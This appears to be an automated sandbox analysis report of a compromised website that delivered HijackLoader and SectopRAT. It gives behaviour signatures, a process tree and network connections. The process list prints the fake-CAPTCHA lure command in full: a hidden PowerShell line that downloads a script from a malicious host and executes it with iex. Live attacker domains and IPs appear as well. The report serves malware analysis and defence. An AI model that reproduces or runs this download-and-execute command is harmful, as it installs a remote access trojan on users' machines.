Analysis Overview
Threat Level: Known bad
The file http://cac-ltd.ca/ was found to be: Known bad.
Malicious Activity Summary
Hijackloader family
SectopRAT payload
Sectoprat family
SectopRAT
HijackLoader
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Enumerates connected drives
Drops file in System32 directory
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-03-12 22:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-12 22:41
Reported
2025-03-12 22:46
Platform
win10v2004-20250217-en
Max time kernel
293s
Max time network
294s
Command Line
Signatures
HijackLoader
Hijackloader family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4044 set thread context of 3448 | N/A | C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3448 set thread context of 2596 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://cac-ltd.ca/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffb09046f8,0x7fffb0904708,0x7fffb0904718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\cmd.exe
cmd /c start /min powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\8ab.msi"
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\8ab.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6B0897BF9B0BFC5C33497F7960BD05E6 C
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{883FDC82-2DAD-4A12-A0E8-55236ACAF576}
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{C70D3561-E6A6-4677-9B03-AFA7DD5FD740}
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{09951C22-2C83-46B1-BC58-251BDE1F87F4}
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{5107D142-0AF4-4E89-AFDE-1979AB02F34D}
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{01D187BB-1674-403E-B802-BF4BA547F128}
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{2999517C-2F1F-440E-923A-3DF1DFAB1AFB}
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4DECE0DB-7710-482E-AEB7-05E45C12AA3A}
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{2F8A9065-6B6E-4D8E-AC74-2B626783A691}
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6CD903AB-76A2-4553-A3C5-F3CDE8BF0D05}
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe
C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{787E3687-F2C3-46AA-BB32-3CCD4CB168D3}
C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe
C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe
C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe
C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cac-ltd.ca | udp |
| US | 208.109.23.179:80 | cac-ltd.ca | tcp |
| US | 208.109.23.179:80 | cac-ltd.ca | tcp |
| US | 8.8.8.8:53 | www.cac-ltd.ca | udp |
| US | 208.109.23.179:443 | www.cac-ltd.ca | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tripallmaljok.com | udp |
| US | 8.8.8.8:53 | s.w.org | udp |
| TN | 91.92.46.97:443 | tripallmaljok.com | tcp |
| US | 8.8.8.8:53 | kalkgmbzfghq.com | udp |
| US | 104.21.48.122:443 | kalkgmbzfghq.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 192.0.77.48:443 | s.w.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | serviceverifcaptcho.com | udp |
| US | 104.21.79.96:443 | serviceverifcaptcho.com | tcp |
| US | 8.8.8.8:53 | tripallmaljok.com | udp |
